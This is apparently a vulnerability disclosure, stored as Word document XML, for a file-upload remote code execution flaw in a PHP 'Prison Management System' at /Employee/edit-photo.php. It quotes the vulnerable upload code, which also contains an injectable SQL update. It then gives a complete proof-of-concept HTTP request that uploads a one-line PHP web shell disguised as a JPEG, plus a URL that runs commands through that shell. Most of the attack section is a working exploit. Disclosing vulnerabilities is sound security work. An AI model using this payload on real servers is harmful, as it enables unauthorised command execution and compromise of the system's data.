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5842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Prison Management System - File upload RCE (/Employee/edit-photo.php)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072B8138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Vendor Homepage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B08FF63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https://www.sourcecodester.com/sql/17287/prison-management-system.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133A52B9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Version:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F843EAA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V1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F64CB79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Tested on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DEBCAB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PHP, Apache, MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB22A50" w14:textId="04482B10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Affected Page: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 xml:space="preserve"> </w:t>
      </w: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/Employee/edit-photo.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0E16A7" w14:textId="1468D7EF" w:rsidR="00A12E49" w:rsidRPr="00A12E49" w:rsidRDefault="00A12E49" w:rsidP="00A12E4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Using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 xml:space="preserve"> </w:t>
      </w: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>$_FILES['userImage']['tmp_name'])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 xml:space="preserve"> </w:t>
      </w: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as the filename on the server can lead to file upload attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6087EB78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>if(isset($_POST["btnedit"])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59613C86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$image= addslashes(file_get_contents($_FILES['userImage']['tmp_name']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025BCA08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$image_name= addslashes($_FILES['userImage']['name']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16625738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$image_size= getimagesize($_FILES['userImage']['tmp_name']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B8CFAB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move_uploaded_file($_FILES["userImage"]["tmp_name"],"../uploadImage/Profile/" . $_FILES["userImage"]["name"]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E03B92D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$location="uploadImage/Profile/" . $_FILES["userImage"]["name"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE3B5F5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$sql = " update tblemployee set photo='$location' where email='$email'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC86433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if (mysqli_query($conn, $sql)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB8DD75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</w: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header("Location: profile.php");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E149EAF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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4818567F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</w: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$_SESSION['error']='Editing Was Not Successful';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BB2571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ab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E98620D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</w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F66C2E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Proof of vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A10A70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Upload a jpg, capture the packet, modify the file content to malicious code, and modify the file suffix to php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1A297A" w14:textId="77777777" w:rsidR="00A12E49" w:rsidRPr="00A12E49" w:rsidRDefault="00A12E49" w:rsidP="00A12E4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12E49">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="宋体" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="1F2328"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B60F66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lastRenderedPageBreak/>
        <w:t>POST /Employee/edit-photo.php HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6479B357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Host: 192.168.150.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE1F10A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Content-Length: 319</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E8DDB5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Cache-Control: max-age=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218E30C3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Origin: http://192.168.150.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F171AB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DNT: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A29C3D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Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1450B850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Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHpP9AaD4pW6vykY3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BB9AF8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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733507FD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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54806454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Referer: http://192.168.150.131/Employee/edit-photo.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C95C840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Accept-Encoding: gzip, deflate, br</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79302201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Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469569A3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Cookie: PHPSESSID=90379e534d51402f246c8b8c9ff11b59</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0273FE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Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1228D90D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441B9247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------WebKitFormBoundaryHpP9AaD4pW6vykY3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C77D5D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Content-Disposition: form-data; name="userImage"; filename="test.php"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3021553E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Content-Type: image/jpeg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CFFA20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0ABB65DC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&lt;?php echo shell_exec($_GET['cmd']);?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523F604B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------WebKitFormBoundaryHpP9AaD4pW6vykY3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645E0000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Content-Disposition: form-data; name="btnedit"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0532E947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0D2C0424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6CA78728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------WebKitFormBoundaryHpP9AaD4pW6vykY3--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F8FE91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</w:pPr>
    </w:p>
    <w:p w14:paraId="784AF663" w14:textId="77777777" w:rsidR="00A12E49" w:rsidRPr="00A12E49" w:rsidRDefault="00A12E49" w:rsidP="00A12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12E49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</w:rPr>
        <w:t>http://192.168.150.131/uploadImage/Profile/test.php?cmd=whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AB8D3B" w14:textId="50649646" w:rsidR="00704A08" w:rsidRPr="00A12E49" w:rsidRDefault="00A12E49">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="363A17F0" wp14:editId="3DE5DDE3">
            <wp:extent cx="5272405" cy="595630"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="132485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A08" w:rsidRPr="00A1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7"/>
    <w:rsid w:val="001D0979"/>
    <w:rsid w:val="004D7BE6"/>
    <w:rsid w:val="00557067"/>
    <w:rsid w:val="00704A08"/>
    <w:rsid w:val="0072391F"/>
    <w:rsid w:val="00A12E49"/>
    <w:rsid w:val="00A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572"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{623D59A5-D729-482F-B90B-72446471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12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2E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2E49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A12E49"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s1">
    <w:name w:val="pl-s1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00A12E49"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c1">
    <w:name w:val="pl-c1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00A12E49"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s">
    <w:name w:val="pl-s"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00A1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1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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-11T05:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-11T05:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>